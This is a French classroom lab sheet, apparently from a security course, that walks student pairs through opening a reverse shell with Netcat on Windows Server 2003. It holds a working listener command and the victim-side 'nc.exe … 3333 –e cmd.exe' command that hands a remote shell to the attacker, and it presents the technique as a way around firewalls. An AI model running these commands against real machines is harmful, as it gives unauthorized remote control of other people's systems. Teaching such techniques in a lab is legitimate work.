2

Click here to load reader

LAB 5 Reverse Shell Netcat

Embed Size (px)

Citation preview

Page 1: LAB 5 Reverse Shell Netcat

Reverse Shell avec Netcat

1 - Principe

Netcat est un outil réseau souvent appelé « TCP/IP swiss army knife ».

Avec cet outil on envoie des requêtes TCP/IP et on en reçoit. C’est très simple et très puissant !

Nous allons utiliser cet outil afin de se connecter à un ordinateur distant.

Ce qui est important à comprendre ici est le fait que nous allons « forcer » l’ordinateur distant à se

connecter à notre ordinateur et non l’inverse ! D’où le « Reverse » Shell. Nous ne faisons pas une

simple backdoor, qui est plus difficile à mettre en place car les pare-feux font leur boulot !

Ici la victime va ouvrir un prompt visible sur notre machine !

Cela permet de contourner les pare-feux, et nous allons voir comment.

2 - Exploit

Par groupe de 2. Nous utiliserons uniquement Windows Server 2003.

Nous allons récupérer l’outil « Netcat » à cette adresse :

http://joncraton.org/files/nc111nt.zip

Décompresser l’archive dans C:\Windows\system32

Lancez un prompt sur les 2 machines. (Exécuter -> cmd)

Puis aller dans le répertoire que vous venez de décompresser.

PARTIE ATTAQUE

Sur la machine qui attaque, nous allons écouter sur le port 3333 grâce à « netcat ».

Entrer cette commande :

nc.exe -v -L -p 3333 o –v permet d’afficher des détails en console o –L (listen) permet d’écouter les connexions entrantes o –p indique le port sur lequel on écoute

Désormais, n’importe quelle machine peut se connecter sur le port 3333 de notre machine

Page 2: LAB 5 Reverse Shell Netcat

PARTIE VICTIME

La victime doit se connecter sur le port 3333 de la machine qui attaque

Elle doit exécuter un shell afin d’ouvrir une session

Ici nous allons le faire à la main pour rendre les choses plus simple.

Pour cela entrer cette commande :

nc.exe (ipdelautremachine) 3333 –e cmd.exe

o –e précise la commande à exécuter lorsqu’une connexion est établie

La connexion est établie et un shell s’est ouvert sur la machine attaquante !

Screenshot de la machine qui attaque :

Vous avez désormais un shell sur la machine victime.

Nous avons ici exécuté la commande cmd.exe lors de la connexion mais on peut ouvrir d’autres

programmes ! VNC par exemple afin d’avoir le bureau à distance !

3 - Conclusion

Le reverse shell est très puissant car il permet de contourner les pare-feux.

La victime vient à nous et non l’inverse comme dans une simple backdoor.